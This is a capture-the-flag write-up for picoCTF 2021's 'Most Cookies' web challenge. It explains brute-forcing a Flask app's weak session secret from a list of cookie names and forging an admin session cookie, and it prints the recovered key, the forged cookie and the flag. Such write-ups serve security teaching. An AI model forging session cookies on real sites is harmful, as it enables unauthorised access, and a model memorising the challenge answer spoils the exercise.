PicoCTF-2021 Writeup
  • README
  • Binary Exploitation
    • Binary Gauntlet 0
    • Binary Gauntlet 1
    • Stonks
    • What's your input?
  • Cryptography
    • Compress and Attack
    • Dachshund Attacks
    • Double DES
    • Easy Peasy
    • It is my Birthday 2
    • It's Not My Fault 1
    • Mini RSA
    • New Caesar
    • New Vignere
    • No Padding, No Problem
    • Pixelated
    • Play Nice
    • Scrambled: RSA
  • Forensics
    • Disk, disk, sleuth!
    • Disk, disk, sleuth! II
    • information
    • MacroHard WeakEdge
    • Matryoshka doll
    • Milkslap
    • Surfing the Waves
    • Trivial Flag Transfer Protocol
    • tunn3l v1s10n
    • Very very very Hidden
    • Weird File
    • Wireshark doo dooo do doo...
    • Wireshark twoo twooo two twoo...
  • Reverse Engineering
    • ARMssembly 0
    • ARMssembly 2
    • ARMssembly 3
    • ARMssembly 4
    • gogo
    • Hurry up! Wait!
    • keygenme-py
    • Let's get dynamic
    • Rolling My Own
    • Shop
    • speeds and feeds
    • Transformation
  • Web Exploitation
    • Ancient History
    • Bithug
    • GET aHEAD
    • It is my Birthday
    • More Cookies
    • Most Cookies
    • Scavenger Hunt
    • Some Assembly Required 1
    • Some Assembly Required 2
    • Some Assembly Required 3
    • Some Assembly Required 4
    • Super Serial
    • Web Gauntlet 2
    • Web Gauntlet 3
    • Who are you?
    • X marks the spot
Powered by GitBook
On this page
  • Problem
  • Solution
  • Flag

Was this helpful?

Edit on GitHub
  1. Web Exploitation

Most Cookies

PreviousMore CookiesNextScavenger Hunt

Last updated 2 years ago

Was this helpful?

Problem

Alright, enough of using my own encryption. Flask session cookies should be plenty secure! server.py

Solution

  1. Looking at the we can see that the app’s secret key is set to a random cookie name:

    cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
app.secret_key = random.choice(cookie_names)

  2. The app’s secret key is used to sign a flask session cookie so that it cannot be modified. However, since we know the secret key is one of the 28 cookie names, we can simply try them all until we successfully decrypt the cookie.

  3. So, the first step is to go to the website and copy a session cookie: eyJ2ZXJ5X2F1dGgiOiJzbmlja2VyZG9vZGxlIn0.YFNV9A.fnwblKJPgNM2A8VNOblzALp9bTI

  4. We can write a that uses the logic from Flask’s to decode and encode cookies.

  5. But first we need to determine what value we should set in the cookie. We can find this on lines 45-47 of the .

    check = session["very_auth"]
if check == "admin":
    resp = make_response(render_template("flag.html", value=flag_value, title=title))

    So, we need to store {"very_auth": "admin"} in the cookie.

  6. Running the solve will try each secret key and then once it successfully fins the key by decoding a know cookie, it will encode the above cookie data.

    Secret Key: whoopie pie
Admin Cookie: eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.YFNdhA.jyQttlEVJ3eQhTuA9cEp8FDC_fk

  7. We can replace the cookie on the website with our admin cookie, refresh the page, and the flag will be shown.

Flag

picoCTF{pwn_4ll_th3_cook1E5_743c20eb}

http://mercury.picoctf.net:18835/
server.py
server script
script
SecureCookieSessionInterface
server code
script